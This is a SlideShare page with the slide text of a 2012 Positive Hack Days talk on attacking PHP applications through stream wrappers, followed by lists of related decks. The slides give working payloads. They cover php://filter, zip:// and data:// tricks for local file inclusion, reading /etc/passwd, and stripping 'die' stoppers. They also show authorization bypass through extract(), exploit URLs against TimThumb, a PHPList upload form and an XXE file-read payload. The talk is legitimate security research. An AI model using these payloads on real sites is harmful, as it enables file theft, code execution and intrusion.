SlideShare une entreprise Scribd logo

On secure application of PHP wrappers

Télécharger en tant que PPTX, PDF
Positive Hack Days
Positive Hack Days
Technologie
1  sur  29
PHP Wrappers Aleksey Moskvin Positive Technologies May 2012
Streams Streams
Data reading Wrappers $handle = fopen($file, "rb"); while (!feof($handle)) { $contents .= fread($handle, 8192); } fclose($handle); You can get data not only from local files! $file = 'ftp://user:password@10.0.0.1/pub/file.txt'; $file = „http://127.0.0.1/server-status‟; $file = „php://fd/XXX‟; $file = „expect://ls‟;
Data writing Read the file copy ('/etc/passwd' , 'php://output'); file_put_contents(„php://output', file_get_contents('/etc/hosts')); Modify the file, and then write it to the disk move_uploaded_file($_FILES[“attach”]["tmp_name"], “php://filter/string.rot13/resource=./upload/user_attach”); Write data into Apache error_log (PHP >= 5.3.6) error_log („Bypass root perm!‟, 3, „php://fd/2‟);
Wrapper zip:// Requirements: PHP is compiled with zip support. You can use zip:// wrapper in case allow_url_fopen = Off. zip:// wrapper allows you to access file inside the archive with an arbitrary name. $zip = new ZipArchive; if ($zip->open('/tmp/any_name_zip_arxiv',1) ) { $zip->addFromString( '/my/header.html', '<?php print_r(ini_get_all());„ ); } $zip->close(); print file_get_contents('zip:///tmp/any_name_zip_arxiv#/my/header.html');
NULL Byte Replacement $s = $_POST[„path‟]; include $s.‟/header.html‟; allow_url_include directive restricts the usage of http:// ftp:// data:// wrappers. magic_quotes_gpc directive restricts the usage of NULL byte in local files including. If you can create a zip archive, you can use zip:// wrapper: path=zip:///tmp/any_name_zip_arxiv#/my This is effective if allow_url_fopen=Off and magic_quotes_gpc=On An arbitrary archive name allows you to use temporary files created while content loading. Use hpinfo() to get temporary file path: https://rdot.org/forum/showthread.php?t=1134
Wrapper data:// (RFC 2397) According to RFC 2379, data:// wrapper supports more extended syntax: dataurl := "data:" [ mediatype ] [ ";base64" ] "," data mediatype := [ type "/" subtype ] *( ";" parameter ) data := *urlchar parameter := attribute "=" value Wrapper feature: mediatype can be absent or can be filled in by arbitrary values: data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
Trick: function stream_get_meta_data Modify array items returned by stream_get_meta_data $password = 'secret'; $file = $_POST['file']; $fp = fopen( $file, 'r'); extract(stream_get_meta_data($fp)); if ( $mediatype === 'text/plain') { ... } if ( $_COOKIE['admin'] === $password) { ... } Rewrite $password variable POST DATA: file=data://text/plain;password=mysecret;base64, Bypass authorization: Cookie: admin=mysecret
Wrapper compress.zlib:// compress.zlib:// wrapper does not modify ordinary file content readfile('compress.zlib:///etc/hosts'); Local file path can include arbitrary folders name $url = 'compress.zlib:///http://../etc/hosts'; if (preg_match('/http:///', $url) == true) { echo "Yes!"; }
Any Data in parse_url parse_url function handles not only URLs $url_info = parse_url($_POST[„src‟]); if ($url_info['host'] === 'img.youtube.com') { $name = str_replace('/', '', substr($url_info['path'], 4)); copy( $src, './'.$name ); } Loading images from img.youtube.com: POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg Bypass host name checks and create arbitrary files: POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo Local File Manipulation: POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file;
Bypass preg_match validate Filter bypass based on preg_match POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file function validate_url ($url) { $pattern = "/b(?:(?:https?)://|www.)[-a-z0-9+&@#/%?=~_|!:,.;]*[-a-z0-9+&@#/%=~_|]/i"; return preg_match ($pattern, $url); } $src = $_POST['src']; if (!validate_url ($src)) display_error ('invalid url');
Arbitrary File Loading in TimThumb TimThumb is a popular script used for image resize. Public Exploit for v 1.32 (08/2011): http://www.exploit-db.com/exploits/17602 New Wrappers Exploit for v1.34 (revision 145) function check_external ($src) { ………………… if (!validate_url ($src)) display_error ('invalid url'); $url_info = parse_url ($src); ................... if ($url_info['host'] == 'www.youtube.com' || …) parse_str($url_info['query']); .................. $fh = fopen($local_filepath, „w‟); $ch = curl_init($src); ………………….. $files_infos = getimagesize ($local_filepath); if (empty($file_infos[„mime‟]) || …..) unlink($local_filepath); ……………………………… http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php &url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
File Manipulation in TimThumb v1.35 Requirements: curl_init function is diabled on the target server. ………………… if (!$img = file_get_contents ($src)) { display_error ('error....'); } if (file_put_contents ($local_filepath, $img) == FALSE) неопределенного фильтра does not influence the results of other filters { display_error ('error.....'); } ………………… Create a file with arbitrary content: data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZIIFBIUAo «Read» local file: compress.zlib://youtube.com/../http://?/../../path/to/local/file
Secret features of php://filter wrapper php://filter allows users to filter streams while opening. Filter the file content: readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php'); Unknown filter does not influence the results of other filters. convert.base64-decode and string.strip_tags filters can delete data from the stream. Stephan Esser used convert.base64-decode filter features in an exploit for Piwik in 2009: http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability Since 2009, two important questions are not solved: How to delete «unused» data? What are the advantages of filters?
Base64 algorithm: encoding RFC 2045, section 6.8 describes Base64 algorithm. Base64 alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Base64 algorithm: decoding While decoding, only characters of base64 alphabet are handled. The input string is divided into parts by 4 characters, every part is handled separately.
Example. “Instrusion” of stopper You can delete some data using base64_decode several times. $content = "; <? die; ?>n"; $content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]n"; $file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode /resource=./PoC'; file_put_contents($file, $content); “Stub”: /Ly8v ( base64_decode('Ly8v') == '///‟ ) convert.base64-decode filter does not handle strings with equal sign in the middle. $s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
Filter string.strip_tags Filter string.strip_tags speeds up the “extrusion” process $content = "; <? die; ?>n"; $content .= "=3C=3Fprint('PHP');n"; $file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC'; $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C file_put_contents($file, $content); convert.quoted-printable-decode filter handles strings symbol by symbol. Characters in Quoted-Printable ( RFC2045, 6.7 chapter) format are modified into characters of 8 bit code page. Modification into Quoted-Printable format. $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); convert.quoted-printable-decode filter is not effective if the string does not include an equal sign followed by hexadecimal character code. $s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
TextPattern: Upload Arbitrary Files (I) File with .php extension stores information about comments‟ authors. $file = $prefs['tempdir'].DS.'evaluator_trace.php'; if (!file_exists($file)) { $fp = fopen($file, 'wb'); if ($fp) fwrite($fp, "<?php return; ?>n". "This trace-file tracks saved comments. (created ". Пп safe_strftime($prefs['archive_dateformat'],time()).")n". "Format is: Type; Probability; Message “ . “(Type can be -1 => spam, 0 => moderate, 1 => visible)nn");
TextPattern: Upload Arbitrary Files (I)
Partial File Reading in PHPList <= 2.10.13 (I) The reason is a possibility to modify the structure of $_FILES array http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/ if (is_array($_FILES)) { ## only avatars are files foreach ($_FILES['attribute']['name'] as $key => $val) { if (!empty($_FILES['attribute']['name'][$key])) { $tmpnam = $_FILES['attribute']['tmp_name'][$key]; $size = $_FILES['attribute']['size'][$key]; if ($size < MAX_AVATAR_SIZE) { $avatar = file_get_contents($tmpnam); Sql_Query(sprintf('replace into %s (userid,attributeid,value) values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,base64_encode($avatar))); The follow HTML form allows an attacker to upload files into a database. <form action="http://localhost/lists/admin/?page=user&id=1" method="POST” enctype="multipart/form-data" > <input type="file" name="attribute[tmp_name]["> <input type="file" name="attribute[size]["> <input type="file" name="attribute[[tmp_name]"> <input type="file" name="attribute[name]["> <input name="change" value="Save Changes" type="submit"> </form>
Partial File Reading in PHPList <= 2.10.13 (II)
getimagesize check bypass (I) With filters, you manage not only to delete stoppers but also modify images checked on the basis of getimagesize function. If you manage to inject data into EXIF image
getimagesize check bypass (II) extract($_REQUEST); ….. include $templatedir.'/header.html'; ..... if (!empty($_FILES) ) { $file_info = getimagesize($_FILES['image']['tmp_name']); if($file_info['mime'] == 'image/jpeg') { if ( move_uploaded_file( $_FILES['image']['tmp_name'], $folder.'/avatar.jpg') ) ...... Load an image, but a zip archive with /my/header.html file is stored on the server. folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/ Add the file into the zip archive templatedir=zip:///tmp/avatar.jpg#/my
Files with arbitrary content If you manage to create a file with arbitrary content, you can: create a session file and exploit the unserialize bug via session_start(); create a zip archive and exploit RFI; create/rewrite files htaccess/htpasswd; create or rewrite templates.
parse_ini_file atack parse_ini_file function handles local files only. session_start(); $_SESSION['admin'] = $_POST['name']; ....... $var = parse_ini_file($inifile); require $var['require']; Create session file /tmp/sess_dffdsdf24gssdgsd90 admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5" With filters, transform the session file into format suitable for parse_ini_file function. php://filter/read=convert.base64-decode|convert.base64-decode| convert.base64-decode/resource= /tmp/sess_dffdsdf24gssdgsd90
XXE Attack Read files via XML Injection. <?xml version='1.0'?> <!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64- encode/resource=http://127.0.0.1/server-status"> ]> <scan>&test;</scan> simplexml_load_file function and DOMDocument::load method supports wrappers.
Limitations for the usage of wrappers By default, you are not allowed to use wrappers in includes with installed Suhosin (even if allow_url_include = On). For example, zip:// wrapper is available as soon as whitelist includes it: suhosin.executor.include.whitelist = “zip” file_exists, is_file, filesize functions return FALSE in case wrappers php://filter, zip://, data:// are used as file names.
Thank you for your attention! Questions?

Recommandé

C99[2]
C99[2]C99[2]
C99[2]guest8914af
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
08 php-files
08 php-files08 php-files
08 php-fileshoangphuc2587
 
Intro to php
Intro to phpIntro to php
Intro to phpSp Singh
 
Intro to PHP
Intro to PHPIntro to PHP
Intro to PHPSandy Smith
 
Introducing PHP Data Objects
Introducing PHP Data ObjectsIntroducing PHP Data Objects
Introducing PHP Data Objectswebhostingguy
 
Ch3(working with file)
Ch3(working with file)Ch3(working with file)
Ch3(working with file)Chhom Karath
 
PHP5.5 is Here
PHP5.5 is HerePHP5.5 is Here
PHP5.5 is Herejulien pauli
 

Recommandé

C99[2]
C99[2]C99[2]
C99[2]guest8914af
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
08 php-files
08 php-files08 php-files
08 php-fileshoangphuc2587
 
Intro to php
Intro to phpIntro to php
Intro to phpSp Singh
 
Intro to PHP
Intro to PHPIntro to PHP
Intro to PHPSandy Smith
 
Introducing PHP Data Objects
Introducing PHP Data ObjectsIntroducing PHP Data Objects
Introducing PHP Data Objectswebhostingguy
 
Ch3(working with file)
Ch3(working with file)Ch3(working with file)
Ch3(working with file)Chhom Karath
 
PHP5.5 is Here
PHP5.5 is HerePHP5.5 is Here
PHP5.5 is Herejulien pauli
 
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuMengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuAlferizhy Chalter
 
4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebookguoqing75
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証ME iBotch
 
PHP 5.3 Overview
PHP 5.3 OverviewPHP 5.3 Overview
PHP 5.3 Overviewjsmith92
 
Lesson 9. The Apache Web Server
Lesson 9. The Apache Web ServerLesson 9. The Apache Web Server
Lesson 9. The Apache Web Serverwebhostingguy
 
extending-php
extending-phpextending-php
extending-phptutorialsruby
 
関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐいHisateru Tanaka
 
Perforce Object and Record Model
Perforce Object and Record Model Perforce Object and Record Model
Perforce Object and Record Model Perforce
 
Php tips-and-tricks4128
Php tips-and-tricks4128Php tips-and-tricks4128
Php tips-and-tricks4128PrinceGuru MS
 
Cod
CodCod
CodStan Adrian
 
mapserver_install_linux
mapserver_install_linuxmapserver_install_linux
mapserver_install_linuxtutorialsruby
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
Perl basics for pentesters part 2
Perl basics for pentesters part 2Perl basics for pentesters part 2
Perl basics for pentesters part 2n|u - The Open Security Community
 
SPL: The Missing Link in Development
SPL: The Missing Link in DevelopmentSPL: The Missing Link in Development
SPL: The Missing Link in Developmentjsmith92
 
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themPSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themSérgio Rafael Siqueira
 
eZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedeZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedBertrand Dunogier
 
Drupal 8 configuration management
Drupal 8 configuration managementDrupal 8 configuration management
Drupal 8 configuration managementAlexander Tkachev
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with AugeasPuppet
 
Augeas @RMLL 2012
Augeas @RMLL 2012Augeas @RMLL 2012
Augeas @RMLL 2012Raphaël PINSON
 
eZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedeZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedBertrand Dunogier
 
vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking Sebastian Marek
 
AWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewAWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewDan Morrill
 

Contenu connexe

Tendances

Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuMengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuAlferizhy Chalter
 
4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebookguoqing75
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証ME iBotch
 
PHP 5.3 Overview
PHP 5.3 OverviewPHP 5.3 Overview
PHP 5.3 Overviewjsmith92
 
Lesson 9. The Apache Web Server
Lesson 9. The Apache Web ServerLesson 9. The Apache Web Server
Lesson 9. The Apache Web Serverwebhostingguy
 
関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐいHisateru Tanaka
 
Perforce Object and Record Model
Perforce Object and Record Model Perforce Object and Record Model
Perforce Object and Record Model Perforce
 
Php tips-and-tricks4128
Php tips-and-tricks4128Php tips-and-tricks4128
Php tips-and-tricks4128PrinceGuru MS
 
mapserver_install_linux
mapserver_install_linuxmapserver_install_linux
mapserver_install_linuxtutorialsruby
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
SPL: The Missing Link in Development
SPL: The Missing Link in DevelopmentSPL: The Missing Link in Development
SPL: The Missing Link in Developmentjsmith92
 
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themPSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themSérgio Rafael Siqueira
 

Tendances (15)

Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuMengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
 
4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証
 
PHP 5.3 Overview
PHP 5.3 OverviewPHP 5.3 Overview
PHP 5.3 Overview
 
Lesson 9. The Apache Web Server
Lesson 9. The Apache Web ServerLesson 9. The Apache Web Server
Lesson 9. The Apache Web Server
 
extending-php
extending-phpextending-php
extending-php
 
関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい
 
Perforce Object and Record Model
Perforce Object and Record Model Perforce Object and Record Model
Perforce Object and Record Model
 
Php tips-and-tricks4128
Php tips-and-tricks4128Php tips-and-tricks4128
Php tips-and-tricks4128
 
Cod
CodCod
Cod
 
mapserver_install_linux
mapserver_install_linuxmapserver_install_linux
mapserver_install_linux
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
 
Perl basics for pentesters part 2
Perl basics for pentesters part 2Perl basics for pentesters part 2
Perl basics for pentesters part 2
 
SPL: The Missing Link in Development
SPL: The Missing Link in DevelopmentSPL: The Missing Link in Development
SPL: The Missing Link in Development
 
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themPSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore them
 

Similaire à On secure application of PHP wrappers

eZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedeZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedBertrand Dunogier
 
Drupal 8 configuration management
Drupal 8 configuration managementDrupal 8 configuration management
Drupal 8 configuration managementAlexander Tkachev
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with AugeasPuppet
 
eZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedeZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedBertrand Dunogier
 
vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking Sebastian Marek
 
AWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewAWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewDan Morrill
 
vfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent testsvfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent testsFrank Kleine
 
Building Lithium Apps
Building Lithium AppsBuilding Lithium Apps
Building Lithium AppsNate Abele
 
Lithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo EditionLithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo EditionNate Abele
 
Advanced symfony Techniques
Advanced symfony TechniquesAdvanced symfony Techniques
Advanced symfony TechniquesKris Wallsmith
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confooterry chay
 
Symfony internals [english]
Symfony internals [english]Symfony internals [english]
Symfony internals [english]Raul Fraile
 

Similaire à On secure application of PHP wrappers (20)

eZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedeZ Publish Cluster Unleashed
eZ Publish Cluster Unleashed
 
Drupal 8 configuration management
Drupal 8 configuration managementDrupal 8 configuration management
Drupal 8 configuration management
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with Augeas
 
Augeas @RMLL 2012
Augeas @RMLL 2012Augeas @RMLL 2012
Augeas @RMLL 2012
 
eZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedeZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisited
 
vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking
 
AWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewAWS Hadoop and PIG and overview
AWS Hadoop and PIG and overview
 
Tutorial Puppet
Tutorial PuppetTutorial Puppet
Tutorial Puppet
 
Frontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and HowFrontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and How
 
vfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent testsvfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent tests
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
Building Lithium Apps
Building Lithium AppsBuilding Lithium Apps
Building Lithium Apps
 
Lithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo EditionLithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo Edition
 
Advanced symfony Techniques
Advanced symfony TechniquesAdvanced symfony Techniques
Advanced symfony Techniques
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confoo
 
Symfony internals [english]
Symfony internals [english]Symfony internals [english]
Symfony internals [english]
 

Plus de Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

Plus de Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Dernier

ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
